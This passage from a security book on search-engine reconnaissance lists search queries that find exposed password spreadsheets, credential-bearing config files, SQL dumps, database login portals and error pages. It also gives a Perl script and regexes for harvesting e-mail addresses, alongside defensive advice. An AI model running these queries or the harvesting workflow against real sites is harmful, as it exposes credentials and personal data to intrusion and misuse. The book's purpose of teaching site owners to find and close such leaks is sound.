intext:"Session Start * * *" filetype:log                           IRC/AIM log files
filetype:cfg login "LoginServer="                                   Ultima Online log files
ext:log password END_FILE                                           Java password files
"ZoneAlarm Logging Client"                                          ZoneAlarm log files
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"        PHP error logs

Log files reveal various types of information, as shown in the search for filetype:log username putty in Figure 10.6. This log file lists machine names and associated usernames that could be reused in an attack against the machine.

Figure 10.6 Putty Log Files Reveal Sensitive Data
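Seen from the defender's side, the configuration and log file searches above translate into a simple self-check: look for the same kinds of files under your own Web root before a crawler finds them. The following is a minimal sketch, assuming the document root is readable on the local file system. The function name find_risky_files and the extension list (drawn from file types discussed in this chapter) are illustrative choices, not part of any tool mentioned in the text.

```python
import os

# Extensions taken from the file types discussed in this chapter; this list is
# an assumption for illustration and should be adjusted for your own environment.
RISKY_EXTENSIONS = {".log", ".ini", ".conf", ".cfg", ".cnf", ".inc", ".sql", ".mdb"}


def find_risky_files(web_root):
    """Return paths (relative to web_root) whose extension is in RISKY_EXTENSIONS."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        for name in filenames:
            extension = os.path.splitext(name)[1].lower()
            if extension in RISKY_EXTENSIONS:
                full_path = os.path.join(dirpath, name)
                hits.append(os.path.relpath(full_path, web_root))
    return sorted(hits)
```

Calling find_risky_files on a document root returns a sorted list of candidate files to review. A hit is not proof of exposure, since the Web server might refuse to serve the file, but each one is worth checking by hand.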
Office Documents

The term office document generally refers to documents created by word processing software, spreadsheet software, and lightweight database programs. Common word processing software includes Microsoft Word, Corel WordPerfect, MacWrite, and Adobe Acrobat. Common spreadsheet programs include Microsoft Excel, Lotus 1-2-3, and Linux's Gnumeric. Other documents that are generally lumped together under the office document category include Microsoft PowerPoint, Microsoft Works, and Microsoft Access documents. Table 10.3 lists some of the more common office document file types, organized roughly by their Internet popularity (based on number of Google hits).

Table 10.3 Popular Office Document File Types

Extension   File Type
PDF         Adobe Portable Document Format
DOC         Microsoft Word document
TXT         Text file
XLS         Microsoft Excel or Works spreadsheet
PPT         Microsoft PowerPoint
RTF         Rich Text Format document
WP          WordPerfect document
WK1         Lotus 1-2-3 spreadsheet
WPS         Microsoft Works word processor file
MDB         Microsoft Access database
MCW, MW     MacWrite file

In many cases, simply searching for these files with filetype is pointless without an additional specific search. Google hackers have successfully uncovered all sorts of interesting files by simply throwing search terms such as private or password or admin onto the tail end of a filetype search. However, simple base searches such as (inurl:xls OR inurl:doc OR inurl:mdb) can be used as a broad search across many file types.

Table 10.4 lists some searches from the GHDB that specifically target office documents. This list shows quite a few specific techniques that we can learn from. Some searches, such as filetype:xls inurl:password.xls, focus on a file with a specific name. The password.xls file does not necessarily belong to any specific software package, but it sounds interesting simply because of the name.
Other searches, such as filetype:xls username password email, shift the focus from the file's name to its contents. The reasoning here is that if an Excel spreadsheet contains the words username, password, and email, there's a good chance the spreadsheet contains sensitive data such as passwords. The heart and soul of a good Google search involves refining a generic search to uncover something extremely relevant. Google's ability to search inside different types of documents is an extremely powerful tool in the hands of an advanced Google user.

Table 10.4 Sample Queries That Locate Potentially Sensitive Office Documents

Query                                   Potential Exposure
filetype:xls username password email    Passwords
filetype:xls inurl:"password.xls"       Passwords
filetype:xls private                    Private data (use as base search)
inurl:admin filetype:xls                Administrative data
filetype:xls inurl:contact              Contact information, e-mail addresses
filetype:xls inurl:"email.xls"          E-mail addresses, names
allinurl: admin mdb                     Administrative database
filetype:mdb inurl:users.mdb            User lists, e-mail addresses
inurl:email filetype:mdb                User lists, e-mail addresses
data filetype:mdb                       Various data (use as base search)
inurl:backup filetype:mdb               Backup databases
inurl:profiles filetype:mdb             User profiles
inurl:*db filetype:mdb                  Various data (use as base search)

Database Digging

There has been intense focus recently on the security of Web-based database applications, specifically the front-end software that interfaces with a database. Within the security community, talk of SQL injection has all but replaced talk of the once-common CGI vulnerability, indicating that databases have arguably become a greater target than the underlying operating system or Web server software.
An attacker will not generally use Google to break into a database or muck with a database front-end application; rather, Google hackers troll the Internet looking for bits and pieces of database information leaked from potentially vulnerable servers. These bits and pieces of information can be used to first select a target and then to mount a more educated attack (as opposed to a ground-zero blind attack) against the target. Bearing this in mind, understand that here we do not discuss the actual mechanics of the attack itself, but rather the surprisingly invasive information-gathering phase an accomplished Google hacker will employ prior to attacking a target.

Login Portals

As we discussed in Chapter 8, a login portal is the "front door" of a Web-based application. Proudly displaying a username and password dialog, login portals generally bear the scrutiny of most Web attackers simply because they are the one part of an application that is most carefully secured. There are obvious exceptions to this rule, but as an analogy, if you're going to secure your home, aren't you going to first make sure your front door is secure? A typical database login portal is shown in Figure 10.7. This login page announces not only the existence of an SQL Server but also the Microsoft Web Data Administrator software package.

Figure 10.7 A Typical Database Login Portal

Regardless of its relative strength, the mere existence of a login portal provides a glimpse into the type of software and hardware that might be employed at a target.
Put simply, a login portal is terrific for footprinting. In extreme cases, an unsecured login portal serves as a welcome mat for an attacker. To this end, let's look at some queries that an attacker might use to locate database front ends on the Internet. Table 10.5 lists queries that locate database front ends or interfaces. Most entries are pulled from the GHDB.

Table 10.5 Queries That Locate Database Interfaces

Query                                                                       Potential Exposure
"ClearQuest Web Logon"                                                      ClearQuest (CQWEB)
filetype:fp5 fp5 -"cvs log"                                                 FileMaker Pro
filetype:fp3 fp3                                                            FileMaker Pro
filetype:fp7 fp7                                                            FileMaker Pro
"Select a database to view" intitle:"filemaker pro"                         FileMaker Pro
"Welcome to YourCo Financial"                                               IBM Websphere
"(C) Copyright IBM" "Welcome to Websphere"                                  IBM Websphere
inurl:names.nsf?opendatabase                                                Lotus Domino
inurl:"/catalog.nsf" intitle:catalog                                        Lotus Domino
intitle:"messaging login" "© Copyright IBM"                                 Lotus Messaging
intitle:"Web Data Administrator - Login"                                    MS SQL login
intitle:"Gateway Configuration Menu"                                        Oracle
intitle:"oracle http server index" "Copyright * Oracle Corporation."        Oracle HTTP Server
inurl:admin_/globalsettings.htm                                             Oracle HTTP Listener
inurl:pls/admin_/gateway.htm                                                Oracle login portal
inurl:/pls/sample/admin_/help/                                              Oracle default manuals
"phpMyAdmin" "running on" inurl:"main.php"                                  phpMyAdmin
"Welcome to phpMyAdmin" "Create new database"                               phpMyAdmin
intitle:"index of /phpmyadmin" modified                                     phpMyAdmin
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"     phpMyAdmin
inurl:main.php phpMyAdmin                                                   phpMyAdmin
intext:SQLiteManager inurl:main.php                                         SQLite Manager

Underground Googling: Login Portals

One way to locate login portals is to focus on the word login. Another way is to focus on the copyright at the bottom of a page. Most big-name portals put a copyright notice at the bottom of the page.
Combine this with the product name, and a welcome or two, and you're off to a good start. If you run out of ideas for new databases to try, go to http://labs.google.com/sets, enter oracle and mysql, and click Large Set for a list of databases.

Support Files

Another way an attacker can locate or gather information about a database is by querying for support files that are installed with, accompany, or are created by the database software. These can include configuration files, debugging scripts, and even sample database files. Table 10.6 lists some searches that locate specific support files that are included with or are created by popular database clients and servers.

Table 10.6 Queries That Locate Database Support Files

Query                                           Description
inurl:default_content.asp ClearQuest            ClearQuest Web help files
intitle:"index of" intext:globals.inc           MySQL globals.inc file, lists connection and credential information
filetype:inc intext:mysql_connect               PHP MySQL Connect file, lists connection and credential information
filetype:inc dbconn                             Database connection file, lists connection and credential information
intitle:"index of" intext:connect.inc           MySQL connection file, lists connection and credential information
filetype:properties inurl:db intext:password    db.properties file, lists connection information
intitle:"index of" mysql.conf OR mysql_config   MySQL configuration file, lists port number, version number, and path information to MySQL server
inurl:php.ini filetype:ini                      PHP.INI file, lists connection and credential information
filetype:ldb admin                              Microsoft Access lock files, list database and username
inurl:config.php dbuname dbpass                 The old config.php script, lists user and password information
intitle:index.of config.php                     The config.php script, lists user and password information
"phpinfo.php" -manual                           The output from phpinfo.php, lists a great deal of information
intitle:"index of" +myd size                    The MySQL data directory
filetype:cnf my.cnf -cvs -example               The MySQL my.cnf file, can list information ranging from paths and database names to passwords and usernames
filetype:ora ora                                ORA configuration files, list Oracle database information
filetype:pass pass intext:userid                dbman files, list encoded passwords
filetype:pdb pdb backup (Pilot | Pluckerdb)     Palm database files, can list all sorts of personal information

As an example of a support file, PHP scripts using the mysql_connect function reveal machine names, usernames, and cleartext passwords, as shown in Figure 10.8. Strictly speaking, this file contains PHP code, but the INC extension makes it an include file. It's the content of this file that is of interest to a Google hacker.

Figure 10.8 PHP Files Can Reveal Machine Names, Usernames, and Passwords
Error Messages

As we've discussed throughout this book, error messages can be used for all sorts of profiling and information-gathering purposes. Error messages also play a key role in the detection and profiling of database systems. As is the case with most error messages, database error messages can also be used to profile the operating system and Web server version. Conversely, operating system and Web server error messages can be used to profile and detect database servers. Table 10.7 shows queries that leverage database error messages.

Table 10.7 Queries That Locate Database Error Messages

Query                                                                     Description
intitle:"Error Occurred While Processing Request"                         ColdFusion error message, can reveal SQL statements and server information
intitle:"Error Occurred" "The error occurred in" filetype:cfm             ColdFusion error message, can reveal source code, full pathnames, SQL query info, database name, SQL state information, and local time information
"detected an internal error [IBM][CLI Driver][DB2/6000]"                  DB2 error message, can reveal pathnames, function names, filenames, partial code, and program state
An unexpected token "END-OF-STATEMENT" was found                          DB2 error message, can reveal pathnames, function names, filenames, partial code, and program state
"Error Diagnostic Information" intitle:"Error Occurred While"             Generic error message, reveals various information
"You have an error in your SQL syntax near"                               Generic SQL message, can reveal pathnames and partial SQL code
"MySQL error with query"                                                  MySQL error message, reveals various information
"supplied argument is not a valid MySQL result resource"                  MySQL error message, reveals real pathnames and listings of other PHP scripts on the server
"ORA-12541: TNS:no listener" intitle:"error occurred"                     Oracle error message, reveals SQL code, pathnames, filenames, and data sources
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"    PostgreSQL error message, reveals path information and database names
"ORA-00921: unexpected end of SQL command"                                Oracle SQL error message, reveals full Web pathnames and/or php filenames
"ORA-00933: SQL command not properly ended"                               Oracle SQL error message, reveals pathnames, function names, filenames, and partial SQL code
"ORA-00936: missing expression"                                           Oracle SQL error message, reveals pathnames, function names, filenames, and partial SQL code
"PostgreSQL query failed: ERROR: parser: parse error"                     PostgreSQL error message, can reveal pathnames, function names, filenames, and partial code
"Supplied argument is not a valid PostgreSQL result"                      PostgreSQL error message, can reveal pathnames, function names, filenames, and partial code
"Unclosed quotation mark before the character string"                     SQL error message, can reveal pathnames, function names, filenames, and partial code
"Incorrect syntax near"                                                   SQL error message, can reveal pathnames, function names, filenames, and partial code
"Incorrect syntax near" -the                                              SQL error message, can reveal pathnames, function names, filenames, and partial code (variation)
"access denied for user" "using password"                                 SQL error message, can reveal pathnames, function names, filenames, and partial code (variation)
"Can't connect to local" intitle:warning                                  SQL error message, can reveal pathnames, function names, filenames, and partial code (variation)

In addition to revealing information about the database server, error messages can also reveal much more dangerous information about potential vulnerabilities that exist in the server. For example, consider an error such as "SQL command not properly ended", displayed in Figure 10.9. This error message indicates that a terminating character was not found at the end of an SQL statement. If the command accepts user input, an attacker could leverage the information in this error message to execute an SQL injection attack.

Figure 10.9 The Discovery of a Dangerous Error Message
Database Dumps

The output of a database into any format can be considered a database dump. For the purposes of Google hacking, however, we'll use the term database dump to describe the text-based conversion of a database. As we'll see next in this chapter, it's entirely possible for an attacker to locate just about any type of binary database file, but standardized formats (such as the text-based SQL dump shown in Figure 10.10) are very commonplace on the Internet.

Figure 10.10 A Typical SQL Dump

Using a full database dump, a database administrator can completely rebuild a database. This means that a full dump details not only the structure of the database's tables but also every record in each and every table. Depending on the sensitivity of the data contained in the database, a database dump can be very revealing and obviously makes a terrific tool for an attacker. There are several ways an attacker can locate database dumps. One of the most obvious ways is by focusing on the headers of the dump, resulting in a query such as "# Dumping data for table", as shown in Figure 10.10.
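The same header that makes a dump easy to find with Google makes it easy to recognize in files you already hold, for example when reviewing what sits under your own Web root. The sketch below is an illustration built on assumptions: the function names, the regular expression, and the choice of "user" and "pass" as interesting substrings (taken from the search terms discussed in this section) are hypothetical, and real dump tools vary in how they write the header.

```python
import re

# Matches header comments such as:  # Dumping data for table 'artists'
# Accepting a "--" comment prefix and backtick quoting is an assumption about
# how other dump tools format the same header.
DUMP_HEADER = re.compile(
    r"^\s*(?:#|--)\s*Dumping data for table\s+[`']?(\w+)",
    re.IGNORECASE | re.MULTILINE,
)
INTERESTING = ("user", "pass")


def dumped_tables(text):
    """Return the table names announced by dump headers, in order of appearance."""
    return DUMP_HEADER.findall(text)


def interesting_tables(text):
    """Return dumped tables whose names contain one of the INTERESTING substrings."""
    return [
        table for table in dumped_tables(text)
        if any(word in table.lower() for word in INTERESTING)
    ]


sample = """\
# Dumping data for table 'artists'
INSERT INTO artists VALUES (1, 'Doe', 'Jane', '');
-- Dumping data for table `users`
"""
print(dumped_tables(sample))       # prints: ['artists', 'users']
print(interesting_tables(sample))  # prints: ['users']
```

Matching on the table name is only a first-pass filter; a table with an innocent name can still hold credentials, so flagged and unflagged dumps both deserve a manual look.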
This header-based approach can be expanded to work on just about any type of database dump by focusing on headers that exist in every dump and that are unique phrases unlikely to produce false positives. Specifying additional specific interesting words or phrases such as username, password, or user can help narrow this search. For example, if the word password exists in a database dump, there's a good chance that a password of some sort is listed inside the database dump. With proper use of the OR symbol ( | ), an attacker can craft an extremely effective search, such as "# Dumping data for table (user | username | pass | password)". In addition, an attacker could focus on file extensions that some tools add to the end of a database dump by querying for filetype:sql sql and further narrowing to specific words, phrases, or sites. The SQL file extension is also used as a generic description of batched SQL commands. Table 10.8 lists queries that locate SQL database dumps.

Table 10.8 Queries That Locate SQL Database Dumps

Query                                                       Description
inurl:nuke filetype:sql                                     php-nuke or postnuke CMS dumps
filetype:sql password                                       SQL database dumps or batched SQL commands
filetype:sql "IDENTIFIED BY" -cvs                           SQL database dumps or batched SQL commands, focus on "IDENTIFIED BY", which can locate passwords
"# Dumping data for table (username|user|users|password)"   SQL database dumps or batched SQL commands, focus on interesting terms
"#mysql dump" filetype:sql                                  SQL database dumps
"# Dumping data for table"                                  SQL database dumps
"# phpMyAdmin MySQL-Dump" filetype:txt                      SQL database dumps created by phpMyAdmin
"# phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"              SQL database dumps created by phpMyAdmin (variation)

Actual Database Files

Another way an attacker can locate databases is by searching directly for the database itself.
This technique does not apply to all database systems, only those systems in which the database is represented by a file with a specific name or extension. Be advised that Google will most likely not understand how to process or translate these files, so the summary (or "snippet") on the search result page will be blank and Google will list the file as an "unknown type," as shown in Figure 10.11.

Figure 10.11 Database Files Themselves Are Often Unknown to Google
[Screenshot: Google results for filetype:mdb site:com, about 4,000 hits, each listed as "File Format: Unrecognized" with no snippet.]

If Google does not understand the format of a binary file, as with many of those located with the filetype operator, you will be unable to search for strings within that file. This considerably limits the options for effective searching, forcing you to rely on inurl or site operators instead. Table 10.9 lists some queries that can locate database files.

Table 10.9 Queries That Locate Database Files

Query
    Description

filetype:cfm "cfapplication name" password
    ColdFusion source code
filetype:mdb inurl:users.mdb
    Microsoft Access user database
inurl:email filetype:mdb
    Microsoft Access e-mail database
inurl:backup filetype:mdb
    Microsoft Access backup databases
inurl:forum filetype:mdb
    Microsoft Access forum databases
inurl:/db/main.mdb
    ASP-Nuke databases
inurl:profiles filetype:mdb
    Microsoft Access user profile databases
filetype:asp DBQ=" * Server.MapPath("*.mdb")
    Microsoft Access database connection string search
allinurl: admin mdb
    Microsoft Access administration databases

Automated Grinding

Searching for files is fairly straightforward, especially if you know the type of file you're looking for. We've already seen how easy it is to locate files that contain sensitive data, but in some cases it might be necessary to search files offline. For example, assume that we want to troll for yahoo.com e-mail addresses. A query such as "@yahoo.com" email is not at all effective as a Web search, and even as a Groups search it is problematic, as shown in Figure 10.12.

Figure 10.12 A Generic E-Mail Search Leaves Much to Be Desired
[Screenshot: Google Groups results for "@yahoo.com" email, about 2,590,000 hits, mostly spam reports from news.admin.net-abuse.sightings that mention yahoo.com hosts as well as addresses.]
This search located one e-mail address, jg65_83@yahoo.com, but also keyed on store.yahoo.com, which is not a valid e-mail address. In cases like this, the best option for locating specific strings lies in the use of regular expressions. This involves downloading the documents you want to search (which you most likely found with a Google search) and parsing those files for the information you're looking for. You could opt to automate the process of downloading these files, as we'll show in Chapter 12, but once you have downloaded the files, you'll need an easy way to search the files for interesting information. Consider the following Perl script:

    #!/usr/bin/perl
    #
    # Usage: ./ssearch.pl FILE_TO_SEARCH WORDLIST
    #
    # Locate words in a file, coded by James Foster
    #
    use strict;

    open(SEARCHFILE, $ARGV[0]) || die("Can not open searchfile because $!");
    open(WORDFILE, $ARGV[1]) || die("Can not open wordfile because $!");

    # Read every word (or regular expression) from the word list
    my @WORDS = <WORDFILE>;
    close(WORDFILE);

    my $LineCount = 0;

    while (<SEARCHFILE>) {
        foreach my $word (@WORDS) {
            chomp($word);
            ++$LineCount;
            # Print the first match on this line, then move on to the next line
            if (m/$word/) {
                print "$&\n";
                last;
            }
        }
    }
    close(SEARCHFILE);

This script accepts two arguments: a file to search and a list of words to search for. As it stands, this program is rather simplistic, acting as nothing more than a glorified grep script. However, the script becomes much more powerful when, instead of words, the word list contains regular expressions.
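For readers more at home in Python than Perl, the same loop can be sketched roughly as follows. This is an illustrative port rather than code from the original script: the function name search_lines and the sample data are assumptions made up for the example.

```python
import re

def search_lines(lines, patterns):
    """Return the first pattern match found on each line (hypothetical helper)."""
    compiled = [re.compile(p) for p in patterns]
    hits = []
    for line in lines:
        for rx in compiled:
            match = rx.search(line)
            if match:
                hits.append(match.group(0))
                break  # like Perl's `last`: report at most one hit per line
    return hits

# Made-up sample input standing in for a downloaded file and a word list.
sample_lines = ["login: admin", "nothing to see", "password=secret99"]
sample_patterns = [r"admin", r"password=\w+"]
hits = search_lines(sample_lines, sample_patterns)
print(hits)
```

Because each entry in the pattern list is compiled as a regular expression, plain words and full expressions can be mixed freely in the same list.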
For example, consider the following regular expression, written by Don Ranta:

    [a-zA-Z0-9._-]+@(([a-zA-Z0-9_-]{2,99}\.)+[a-zA-Z]{2,4})|((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9]))

Unless you're somewhat skilled with regular expressions, this might look like a bunch of garbage text. This regular expression is very powerful, however, and will locate various forms of e-mail address.

Let's take a look at this regular expression in action. For this example, we'll save the results of a Google Groups search for "@yahoo.com" email to a file called results.html, and we'll enter the preceding regular expression all on one line of a file called wordfile.txt. As shown in Figure 10.13, we can grab the search results from the command line with a program like Lynx, a common text-based Web browser. Other programs could be used instead of Lynx: Curl, Netcat, Telnet, or even "save as" from a standard Web browser. Remember that Google's terms of service frown on any form of automation. In essence, Google prefers that you simply execute your search from the browser, saving the results manually. However, as we've discussed previously, if you honor the spirit of the terms of service, taking care not to abuse Google's free search service with excessive automation, the folks at Google will most likely not turn their wrath upon you. Regardless, most people will ultimately decide for themselves how strictly to follow the terms of service.

Back to our Google search: Notice that the URL indicates we're grabbing the first hundred results, as demonstrated by the use of the num=100 parameter. This will potentially locate more e-mail addresses.
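To see how the e-mail expression separates real addresses from look-alike host names such as store.yahoo.com, it can be tried on a small string. The sketch below uses Python's re module instead of the Perl script; the names OCTET, EMAIL_RE, and find_addresses and the sample text are assumptions invented for this illustration, and the pattern is simply the expression above assembled from its repeated octet piece.

```python
import re

# One IP-address octet, exactly as it appears four times in the expression.
OCTET = r"(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])"

# The e-mail expression: user@domain.tld, or (second branch) a dotted quad.
EMAIL_RE = re.compile(
    r"[a-zA-Z0-9._-]+@(([a-zA-Z0-9_-]{2,99}\.)+[a-zA-Z]{2,4})"
    r"|(" + r"\.".join([OCTET] * 4) + r")"
)

def find_addresses(text):
    """Return every substring of text matched by EMAIL_RE, in order."""
    return [m.group(0) for m in EMAIL_RE.finditer(text)]

# Made-up sample resembling one line of a saved results page.
sample = "Reply-To: <jdoe_01@yahoo.com> is hosted by: store.yahoo.com"
found = find_addresses(sample)
print(found)
```

The host name store.yahoo.com is skipped because the first branch of the expression requires an @ sign before the domain.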
Once the results are saved to the results.html file, we'll run our ssearch.pl script against the results.html file, searching for the e-mail expression we've placed in the wordfile.txt file. To help narrow our results, we'll pipe that output into "grep yahoo | head -15 | sort -u" to return at most 15 unique addresses that contain the word yahoo. The final (obfuscated) results are shown in Figure 10.13.

Figure 10.13 ssearch.pl Hunting for E-Mail Addresses
[Screenshot: a terminal session that saves the Google Groups results page to results.html with lynx -dump, then runs ./ssearch.pl results.html wordfile.txt | grep yahoo | head -15 | sort -u, which prints a dozen obfuscated yahoo.com addresses.]

As you can see, this combination of commands works fairly well at unearthing e-mail addresses. If you're familiar with UNIX commands, you might have already noticed that there is little need for two separate commands. This entire process could have been easily combined into one command by modifying the Perl script to read standard input and piping the output from the Lynx command directly into the ssearch.pl script, effectively bypassing the results.html file. Presenting the commands this way, however, opens the door for irresponsible automation techniques, which isn't overtly encouraged.

Other regular expressions can come in handy as well. This expression, also by Don Ranta, locates URLs:

    [a-zA-Z]{3,4}[sS]?://((([\w\d\-]+\.)+[a-zA-Z]{2,4})|((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])))((\?|/)[\w/=+#_~&:;%\-\?\.]*)

This expression, which will locate URLs and parameters, including addresses that consist of either IP addresses or domain names, is great at processing a Google results page, returning all the links on the page. This doesn't work as well as the API-based methods we'll explore in the next chapter, but it is simpler to use than the API method. This expression locates IP addresses:

    (25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])

We can use an expression like this to help map a target network. These techniques could be used to parse not only HTML pages but also practically any type of document. However, keep in mind that many files are binary, meaning that they should be converted into text before they're searched. The UNIX strings command (usually implemented with strings -8 for this purpose) works very well for this task, but don't forget that Google has the built-in capability to translate many different types of documents for you. If you're searching for visible text, you should opt to use Google's translation, but if you're searching for nonprinted text such as metadata, you'll need to first download the original file and search it offline. Regardless of how you implement these techniques, it should be clear to you by now that Google can be used as an extremely powerful information-gathering tool when it's combined with even a little automation.

Google Desktop Search

The Google Desktop, available from http://desktop.google.com, is an application that allows you to search files on your local machine.
Currently available for Windows 2000 and Windows XP, Google Desktop Search allows you to search many types of files, as shown in Table 10.10.

Table 10.10 Google Desktop Search File Types

File Type                                    Version
Outlook 2000+ e-mail                         Outlook 2000 and newer
Outlook Express 5+ e-mail                    Outlook Express 5 and newer
Text documents                               N/A
HTML documents                               N/A
Word documents                               Office 2000 and newer
Excel spreadsheets                           Office 2000 and newer
PowerPoint presentations                     Office 2000 and newer
AOL Chat conversations                       AOL 7 and newer
AOL Instant Messenger Chat conversations     AIM 5 and newer
Viewed Web pages                             Internet Explorer 5 and newer

The Google Desktop search offers many features, but since it's a beta product, you should check the desktop Web page for a current list of features. To use it as a document-grinding tool, you can simply download content from the target server and use Desktop Search to search through those files. This offers a distinct advantage over searching the content online through Google: you can't OR the filetype operator in an online search, but with Google Desktop Search you can search many different file types with only one query. In addition, the Desktop Search tool captures Web pages that are viewed in Internet Explorer 5 and newer. This means you can always view an older version of a page you've visited online, even when the original page has changed. Finally, once Desktop Search is installed, any online Google search you perform in Internet Explorer will also return results found on your local machine.

Summary

The subject of document grinding is a topic worthy of an entire book. In a single chapter, we can only hope to skim the surface of this topic. An attacker (black or white hat) who is skilled in the art of document grinding can glean loads of information about a target.
In this chapter we've discussed the value of configuration files, log files, and office documents, but obviously there are many other types of documents we could focus on as well. The key to document grinding is first discovering the types of documents that exist on a target and then, depending on the number of results, narrowing the documents to the ones that might be the most interesting. Depending on the target, the line of business they're in, the document type, and many other factors, various keywords can be mixed with filetype searches to locate key documents.

Database hacking is also a topic for an entire book. However, there is obvious benefit to the information Google can provide prior to a full-blown database audit. Login portals, support files, and database dumps can provide various information that can be recycled into an audit. Of all the information that can be found from these sources, perhaps the most telling (and devastating) is source code. Lines of source code provide insight into the way a database is structured and can reveal flaws that might otherwise go unnoticed from an external assessment. In most cases, though, a thorough code review is required to determine application flaws. Error messages can also reveal a great deal of information to an attacker.

Automated grinding allows you to search many documents programmatically for bits of important information. When it's combined with Google's excellent document location features, you've got a very powerful information-gathering weapon at your disposal.

Solutions Fast Track

Configuration Files

☑ Configuration files can reveal sensitive information to an attacker.
☑ Although the naming varies, configuration files can often be found with file extensions like INI, CONF, CONFIG, or CFG.

Log Files

☑ Log files can also reveal sensitive information that is often more current than the information found in configuration files.
☑ Naming convention varies, but log files can often be found with file extensions like LOG.

Office Documents

☑ In many cases, office documents are intended for public release. Documents that are inadvertently posted to public areas can contain sensitive information.
☑ Common office file extensions include PDF, DOC, TXT, or XLS.
☑ Document content varies, but strings like private, password, backup, or admin can indicate a sensitive document.

Database Digging

☑ Login portals, especially default portals supplied by the software vendor, are easily searched for and act as magnets for attackers seeking specific versions or types of software. The words login, welcome, and copyright statements are excellent ways of locating login portals.
☑ Support files exist for both server and client software. These files can reveal information about the configuration or usage of an application.
☑ Error messages have varied content that can be used to profile a target.
☑ Database dumps are arguably the most revealing of all database finds because they include full or partial contents of a database. These dumps can be located by searching for strings in the headers, like "# Dumping data for table".

Links to Sites

☑ www.filext.com A great resource for getting information about file extensions.
☑ http://desktop.google.com The Google Desktop Search application.
☑ http://johnny.ihackstuff.com The home of the Google Hacking Database, where you can find more searches like those listed in this chapter.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form.
You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: What can I do to help prevent this form of information leakage?

A: To fix this problem on a site you are responsible for, first review all documents available from a Google search. Ensure that the returned documents are, in fact, supposed to be in the public view. Although you might opt to scan your site for database information leaks with an automated tool (see the Protection chapter), the best way to prevent this is at the source. Your database remote administration tools should be locked down from outside users, default login portals should be reviewed for safety and checked to ensure that software versioning information has been removed, and support files should be removed from your public servers. Error messages should be tailored to ensure that excessive information is not revealed, and a full application review should be performed on all applications in use. In addition, it doesn't hurt to configure your Web server to only allow certain file types to be downloaded. It's much easier to list the file types you will allow than to list the file types you don't allow. See the Appendix for more information about Web application security testing.

Q: I'm concerned about excessive metadata in office documents. Can I do anything to clean up my documents?

A: Microsoft provides a Web page dedicated to the topic: http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q223396. In addition, several utilities are available to automate the cleaning process. One such product, ezClean, is available from www.kklsoftware.com.

Q: Many types of software rely on include files to pull in external content. As I understand it, include files, like the INC files discussed in this chapter, are a problem because they often reveal sensitive information meant for programs, not Web visitors. Is there any way to resolve the dangers of include files?
A: Include files are in fact a problem because of their file extensions. If an extension such as .INC is used, most Web servers will display them as text, revealing sensitive data. Consider blocking .INC files (or whatever extension you use for includes) from being downloaded. This server modification will keep the file from presenting in a browser but will still allow back-end processes to access the data within the file.

Q: Our software uses .INC files to store database connection settings. Is there another way?

A: Rename the extension to .PHP so that the server executes the file instead of displaying its contents.

Q: How can I prevent our X application database from being downloaded by a Google hacker?

A: Read the documentation. Some badly written software has hardcoded paths, but most allow you to place the file outside the Web server's docroot.

Chapter 11

Protecting Yourself from Google Hackers

Solutions in this Chapter:

■ A Good, Solid Security Policy
■ Web Server Safeguards
■ Hacking Your Own Site
■ Getting Help from Google
■ Links to Sites

☑ Summary
☑ Solutions Fast Track
☑ Frequently Asked Questions

Introduction

The purpose of this book is to help you understand the tactics a Google hacker might employ so that you can properly protect yourself and your customers from this seemingly innocuous threat. The best way to do this, in our opinion, is to show you exactly what an attacker armed with a search engine like Google is capable of. There is a point at which we must discuss in no uncertain terms exactly how to prevent this type of information exposure or how to remedy an existing exposure. This chapter is all about protecting your site (or your customer's site) from this type of attack.

We'll look at this topic from several perspectives. First, it's important that you understand the value of strong policy with regard to posting data on the Internet.
This is not a technical topic and could very easily put the techie in you fast asleep, but a sound security policy is absolutely necessary when it comes to properly securing any site. Second, we'll look at slightly more technical topics that describe how to secure your Web site from Google's (and other search engines') crawlers. We'll then look at some tools that can be used to help check a Web site's Google exposure, and we'll spend some time talking about ways Google can help you shore up your defenses.

Underground Googling
Where Are the Details?

There are too many types of servers and configurations to show how to lock them all down. A discussion on Web server security could easily span an entire book series. We'll look at server security at a high level here, focusing on strategies you can employ to specifically protect you from the Google hacker threat. For more details, please check the references in the "Links to Sites" section.

A Good, Solid Security Policy

The best hardware and software configuration money can buy can't protect your resources if you don't have an effective security policy. Before implementing any software assurances, take the time to review your customer's (or your own) security policy. A good security policy, properly enforced, outlines the assets you're trying to protect, how the protection mechanisms are installed, the acceptable level of operational risk, and what to do in the event of a compromise or disaster. Without a solid, enforced security policy, you're fighting a losing battle.

Web Server Safeguards

There are several ways to keep the prying eyes of a Web crawler from digging too deeply into your site. However, bear in mind that a Web server is best suited for storing data that is meant for public consumption. Despite all the best protections, information leaks happen.
If you're really concerned about keeping your sensitive information private, keep it away from your public Web server. Move that data to an intranet or onto a specialized server that is dedicated to serving that information in a safe, responsible, policy-enforced manner.

